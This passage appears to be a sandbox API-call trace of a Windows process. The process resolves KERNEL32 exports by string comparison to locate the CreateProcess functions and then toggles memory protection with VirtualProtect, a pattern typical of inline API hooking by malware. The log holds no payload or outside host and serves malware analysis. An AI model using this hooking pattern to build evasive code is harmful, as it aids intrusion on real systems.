lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateProcessInternalA", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateProcessInternalW", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateProcessW", lpString2="CreateProcessW") returned 0 [0208.866] VirtualProtect (in: lpAddress=0x7ff977b3b780, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x235f508 | out: lpflOldProtect=0x235f508*=0x2) returned 1 [0208.866] VirtualProtect (in: lpAddress=0x7ff977b23a00, dwSize=0xe, flNewProtect=0x40, lpflOldProtect=0x235f500 | out: lpflOldProtect=0x235f500*=0x20) returned 1 [0208.867] VirtualProtect (in: lpAddress=0x7ff977b23a00, dwSize=0xe, flNewProtect=0x20, lpflOldProtect=0x235f500 | out: lpflOldProtect=0x235f500*=0x40) returned 1 [0208.868] VirtualProtect (in: lpAddress=0x7ff977b3b780, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0x235f508 | out: lpflOldProtect=0x235f508*=0x40) returned 1 [0208.868] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4a0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4a0, ReturnLength=0x0) returned 0x0 [0208.868] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0208.868] lstrcmpA (lpString1="AcquireSRWLockExclusive", lpString2="CreateProcessA") returned -1 [0208.868] lstrcmpA (lpString1="AcquireSRWLockShared", lpString2="CreateProcessA") returned -1 [0208.868] lstrcmpA (lpString1="ActivateActCtx", lpString2="CreateProcessA") returned -1 [0208.868] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="CreateProcessA") returned -1 [0208.868] lstrcmpA (lpString1="AddAtomA", lpString2="CreateProcessA") returned -1 [0208.868] lstrcmpA (lpString1="AddAtomW", lpString2="CreateProcessA") returned -1 [0208.868] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="CreateProcessA") returned -1 [0208.868] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="CreateProcessA") returned -1 [0208.868] lstrcmpA (lpString1="AddDllDirectory", lpString2="CreateProcessA") returned -1 [0208.868] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="CreateProcessA") returned -1 [0208.868] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="CreateProcessA") returned -1 [0208.868] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="CreateProcessA") returned -1 [0208.868] lstrcmpA (lpString1="AddRefActCtx", lpString2="CreateProcessA") returned -1 [0208.868] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="AddVectoredContinueHandler", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="AddVectoredExceptionHandler", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="AllocConsole", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="AppXGetOSMaxVersionTested", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="ApplicationRecoveryFinished", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="ApplicationRecoveryInProgress", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="AreFileApisANSI", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="AssignProcessToJobObject", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="AttachConsole", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BackupRead", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BackupSeek", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BackupWrite", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseCheckAppcompatCache", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseCheckAppcompatCacheEx", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseCheckAppcompatCacheExWorker", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseCheckAppcompatCacheWorker", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseCheckElevation", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupport", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupportWorker", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseDestroyVDMEnvironment", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseDllReadWriteIniFile", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseDumpAppcompatCache", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseDumpAppcompatCacheWorker", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseElevationPostProcessing", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseFlushAppcompatCache", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseFlushAppcompatCacheWorker", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseFormatObjectAttributes", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseFormatTimeOut", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseFreeAppCompatDataForProcessWorker", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseGenerateAppCompatData", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseGetNamedObjectDirectory", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseInitAppcompatCacheSupport", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseInitAppcompatCacheSupportWorker", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabled", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabledWorker", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseIsDosApplication", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseQueryModuleData", lpString2="CreateProcessA") returned -1 [0208.869] lstrcmpA (lpString1="BaseReadAppCompatDataForProcessWorker", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BaseSetLastNTError", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BaseThreadInitThunk", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BaseUpdateAppcompatCache", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BaseUpdateAppcompatCacheWorker", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BaseUpdateVDMEntry", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BaseVerifyUnicodeString", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BaseWriteErrorElevationRequiredEvent", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="Basep8BitStringToDynamicUnicodeString", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepAllocateActivationContextActivationBlock", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepAnsiStringToDynamicUnicodeString", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepAppContainerEnvironmentExtension", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepAppXExtension", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepCheckAppCompat", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepCheckWebBladeHashes", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepCheckWinSaferRestrictions", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepConstructSxsCreateProcessMessage", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepCopyEncryption", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepFreeActivationContextActivationBlock", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepFreeAppCompatData", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepGetAppCompatData", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepGetComputerNameFromNtPath", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepGetExeArchType", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepIsProcessAllowed", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepMapModuleHandle", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepNotifyLoadStringResource", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepPostSuccessAppXExtension", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepProcessInvalidImage", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepQueryAppCompat", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepReleaseAppXContext", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepReleaseSxsCreateProcessUtilityStruct", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepReportFault", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BasepSetFileEncryptionCompression", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="Beep", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BeginUpdateResourceA", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BeginUpdateResourceW", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BindIoCompletionCallback", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BuildCommDCBA", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsA", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsW", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="BuildCommDCBW", lpString2="CreateProcessA") returned -1 [0208.870] lstrcmpA (lpString1="CallNamedPipeA", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CallNamedPipeW", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CallbackMayRunLong", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CalloutOnFiberStack", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CancelDeviceWakeupRequest", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CancelIo", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CancelIoEx", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CancelSynchronousIo", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CancelThreadpoolIo", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CancelTimerQueueTimer", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CancelWaitableTimer", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CeipIsOptedIn", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="ChangeTimerQueueTimer", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CheckAllowDecryptedRemoteDestinationPolicy", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CheckElevation", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CheckElevationEnabled", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CheckForReadOnlyResource", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CheckForReadOnlyResourceFilter", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3A", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3W", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CheckRemoteDebuggerPresent", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CheckTokenCapability", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CheckTokenMembershipEx", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="ClearCommBreak", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="ClearCommError", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CloseConsoleHandle", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CloseHandle", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="ClosePackageInfo", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="ClosePrivateNamespace", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CloseProfileUserMapping", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CloseState", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CloseThreadpool", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CloseThreadpoolCleanupGroup", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CloseThreadpoolCleanupGroupMembers", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CloseThreadpoolIo", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CloseThreadpoolTimer", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CloseThreadpoolWait", lpString2="CreateProcessA") returned -1 [0208.871] lstrcmpA (lpString1="CloseThreadpoolWork", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CmdBatNotification", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CommConfigDialogA", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CommConfigDialogW", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CompareCalendarDates", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CompareFileTime", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CompareStringA", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CompareStringEx", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CompareStringOrdinal", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CompareStringW", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="ConnectNamedPipe", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="ConsoleMenuControl", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="ContinueDebugEvent", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="ConvertCalDateTimeToSystemTime", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="ConvertDefaultLocale", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="ConvertFiberToThread", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="ConvertSystemTimeToCalDateTime", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="ConvertThreadToFiber", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="ConvertThreadToFiberEx", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CopyContext", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CopyFile2", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CopyFileA", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CopyFileExA", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CopyFileExW", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CopyFileTransactedA", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CopyFileTransactedW", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CopyFileW", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CopyLZFile", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CreateActCtxA", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CreateActCtxW", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CreateActCtxWWorker", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CreateBoundaryDescriptorA", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CreateBoundaryDescriptorW", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CreateConsoleScreenBuffer", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CreateDirectoryA", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CreateDirectoryExA", lpString2="CreateProcessA") returned -1 [0208.872] lstrcmpA (lpString1="CreateDirectoryExW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateDirectoryTransactedA", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateDirectoryTransactedW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateDirectoryW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateEventA", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateEventExA", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateEventExW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateEventW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateFiber", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateFiberEx", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateFile2", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateFileA", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateFileMappingA", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateFileMappingFromApp", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateFileMappingNumaA", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateFileMappingNumaW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateFileMappingW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateFileTransactedA", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateFileTransactedW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateFileW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateHardLinkA", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateHardLinkTransactedA", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateHardLinkTransactedW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateHardLinkW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateIoCompletionPort", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateJobObjectA", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateJobObjectW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateJobSet", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateMailslotA", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateMailslotW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateMemoryResourceNotification", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateMutexA", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateMutexExA", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateMutexExW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateMutexW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateNamedPipeA", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreateNamedPipeW", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreatePipe", lpString2="CreateProcessA") returned -1 [0208.873] lstrcmpA (lpString1="CreatePrivateNamespaceA", lpString2="CreateProcessA") returned -1 [0208.874] lstrcmpA (lpString1="CreatePrivateNamespaceW", lpString2="CreateProcessA") returned -1 [0208.874] lstrcmpA (lpString1="CreateProcessA", lpString2="CreateProcessA") returned 0 [0208.874] VirtualProtect (in: lpAddress=0x7ff977b3b76c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x235f508 | out: lpflOldProtect=0x235f508*=0x2) returned 1 [0208.874] VirtualProtect (in: lpAddress=0x7ff977b23a0e, dwSize=0xe, flNewProtect=0x40, lpflOldProtect=0x235f500 | out: lpflOldProtect=0x235f500*=0x20) returned 1 [0208.875] VirtualProtect (in: lpAddress=0x7ff977b23a0e, dwSize=0xe, flNewProtect=0x20, lpflOldProtect=0x235f500 | out: lpflOldProtect=0x235f500*=0x40) returned 1 [0208.875] VirtualProtect (in: lpAddress=0x7ff977b3b76c, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0x235f508 | out: lpflOldProtect=0x235f508*=0x40) returned 1 [0208.875] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4a0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4a0, ReturnLength=0x0) returned 0x0 [0208.875] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0208.875] lstrcmpA (lpString1="AcquireSRWLockExclusive", lpString2="CreateProcessAsUserW") returned -1 [0208.875] lstrcmpA (lpString1="AcquireSRWLockShared", lpString2="CreateProcessAsUserW") returned -1 [0208.875] lstrcmpA (lpString1="ActivateActCtx", lpString2="CreateProcessAsUserW") returned -1 [0208.875] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="CreateProcessAsUserW") returned -1 [0208.875] lstrcmpA (lpString1="AddAtomA", lpString2="CreateProcessAsUserW") returned -1 [0208.875] lstrcmpA (lpString1="AddAtomW", lpString2="CreateProcessAsUserW") returned -1 [0208.875] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="CreateProcessAsUserW") returned -1 [0208.875] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AddDllDirectory", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AddRefActCtx", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AddVectoredContinueHandler", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AddVectoredExceptionHandler", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AllocConsole", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AppXGetOSMaxVersionTested", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="ApplicationRecoveryFinished", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="ApplicationRecoveryInProgress", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AreFileApisANSI", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AssignProcessToJobObject", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="AttachConsole", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BackupRead", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BackupSeek", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BackupWrite", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BaseCheckAppcompatCache", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BaseCheckAppcompatCacheEx", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BaseCheckAppcompatCacheExWorker", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BaseCheckAppcompatCacheWorker", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BaseCheckElevation", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupport", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupportWorker", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BaseDestroyVDMEnvironment", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BaseDllReadWriteIniFile", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BaseDumpAppcompatCache", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BaseDumpAppcompatCacheWorker", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BaseElevationPostProcessing", lpString2="CreateProcessAsUserW") returned -1 [0208.876] lstrcmpA (lpString1="BaseFlushAppcompatCache", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseFlushAppcompatCacheWorker", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseFormatObjectAttributes", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseFormatTimeOut", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseFreeAppCompatDataForProcessWorker", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseGenerateAppCompatData", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseGetNamedObjectDirectory", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseInitAppcompatCacheSupport", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseInitAppcompatCacheSupportWorker", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabled", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabledWorker", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseIsDosApplication", 